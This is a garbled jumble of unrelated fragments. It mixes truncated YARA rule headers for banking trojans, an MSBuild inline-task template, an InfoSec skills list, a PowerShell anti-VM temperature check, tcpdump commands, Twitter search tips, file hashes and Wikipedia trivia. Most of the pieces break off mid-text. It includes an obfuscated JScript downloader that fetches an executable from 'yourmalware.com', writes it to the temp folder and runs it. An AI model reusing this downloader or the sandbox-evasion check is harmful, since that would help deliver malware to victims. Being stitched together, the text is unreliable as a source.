/*
   YARA Rule Set
   Author: Ialle Teixeira
   Date: 2019-05-18
   Identifier: MSI banking trojan
*/
rule sig_09328irpf_restiruir_ {
   meta:
      description = "reported by @DefesaDigital - file 09328irpf_restiruir_.msi"
/*
   YARA Rule Set
   Author: Ialle Teixeira
   Date: 2019-05-18
   Identifier: .LNK banking trojan
*/
rule Dil_Peticao_99845650 {
   meta:
      description = "reported by @DefesaDigital - file Dil_Peticao_99845650.lnk"
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" >
  <Target Name="Hello" >
    <!-- Call ANY .NET API -->
    <!--
      Author: Casey Smith, Twitter: @subTee
      License: BSD 3-Clause
++++++ Basic knowledge requirements for cybersecurity and hacking ++++++
These are the basic competencies expected (and tested for during the 1st in-person interview) by a large, very visible InfoSec company. I think it is a good base competency list for anyone looking to get into an InfoSec career (with specialization plus and some programming/scripting ability) or learn cybersecurity/hacking as a hobby:
Networking: Good understanding of OSI layer model / Understanding of communication flow through each layer / Good understanding of functions of each layer / Understanding of major protocols in each layer / In-depth understanding of Layer 3 & Layer 4 protocols: IP, ICMP (Layer 3); TCP, UDP (Layer 4)
Overview of TCP/IP Layer model: ARP / Understanding of Client & Server communication model / Ports common services run on / Ephemeral port vs Well known ports
Understanding of major (everyday Layer 7) services/protocols: DNS / DHCP / HTTP: HTTP Header Fields, HTTP Status Codes, How HTTP mainta
function Get-AntiVMwithTemperature {
    # Query the ACPI thermal zone through WMI (root/wmi namespace).
    $t = Get-WmiObject MSAcpi_ThermalZoneTemperature -Namespace "root/wmi"
    # CurrentTemperature is reported in tenths of a Kelvin.
    $valorTempKelvin = $t.CurrentTemperature / 10
    $valorTempCelsius = $valorTempKelvin - 273.15
    $valorTempFahrenheit = (9/5) * $valorTempCelsius + 32
    return $valorTempCelsius.ToString() + " C : " + $valorTempFahrenheit.ToString() + " F : " + $valorTempKelvin + "K"
}
~ apt install tcpdump
~ apt install argus-client
~ tcpdump -nn -s0 -r Yourdump.pcap -w - | argus -r - -AZJmR -w - | ra -n -Zb -L10 -r - -s +dur +synack +ackdat +swin +dwin +rate +load +tcprtt +loss +runtime +retrans +sgap +dgap - tcp | xargs -d$'\n' -L1 sh -c 'date "+%d.%m.%Y %T $0"'
▪️ containing both “watching” and “now” (this is the default operator): **watching now**
▪️ containing the exact phrase “happy hour”: **“happy hour”**
▪️ containing either “love” or “hate” (or both): **love OR hate**
▪️ containing “beer” but not “root”: **beer -root**
▪️ containing the hashtag **“haiku”**
Name: SCAN_0502_FA2C8.pdf
MD5 dfc20138456eb478673e046754536c76
SHA-1 bbc5dbdf9bbf844854dc52f47b03b88ebac5bc17
SHA-256 a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9
Vhash 913a9ca88f467c85a8c6e005b9321caa5
SSDEEP 384:fC3s7nDeeTykyBmtnbFOB444uBAzLzobLTbL4wu:fC3sO+AAxOBhfAzAbPb8wu
File type PDF
Magic PDF document, version 1.4
File size 16.93 KB (17337 bytes)
https://www.virustotal.com/gui/file/a6b7a89a073be96dcfaac63ef0093e3186171995df90c9c3f966083338e858e9/details
/***************************************************************************/
/*                                                                         */
/* This obfuscated code was created by Javascript Obfuscator Free Version. */
/* Javascript Obfuscator Free Version can be downloaded here               */
/* http://javascriptobfuscator.com                                         */
/*                                                                         */
/***************************************************************************/
var _$_850e = ["http://yourmalware.com/dm.exe", "WScript.Shell", "CreateObject", "Scripting.FileSystemObject", "GetSpecialFolder", "\\0Whst.exe", "MSXML2.XMLHTTP", "GET", "open", "send", "Status", "FileExists", "DeleteFile", "ADODB.Stream", "Open", "Type", "ResponseBody", "Write", "Position", "SaveToFile", "Close", "Run"];
var url = _$_850e[0];
var WshShell = WScript[_$_850e[2]](_$_850e[1]);
'... that the Ludington family included a teenage girl (statue pictured) whose night-long ride to alert the Continental Army of an imminent British attack has been compared to the ride of Paul Revere?... that actress Siobhan Finneran said she wanted her Downton Abbey character "flung off the roof of the Abbey?'
'... that red-headed pine sawfly larvae drag pine needles into the silken tubes in which they live?'
'... that theoretical physicist Deepak Dhar and Ramakrishna Ramaswamy solved the Abelian sandpile model of self-organized criticality with their Dhar-Ramaswamy model?'
'... that Seattles passenger-only ferries, blamed for beach erosion, were forced to slow down because of a class-action lawsuit?'
'... that Juana Bordas says her parents were uncomfortable with the idea of her leaving home to go to college due to the "crab syndrome"?'
'... that the Soviet Armys 7th Guards Tank Division was part of the Group of Soviet Forces in Germany for 43 years during the Cold War?'
'... that the call letters of radio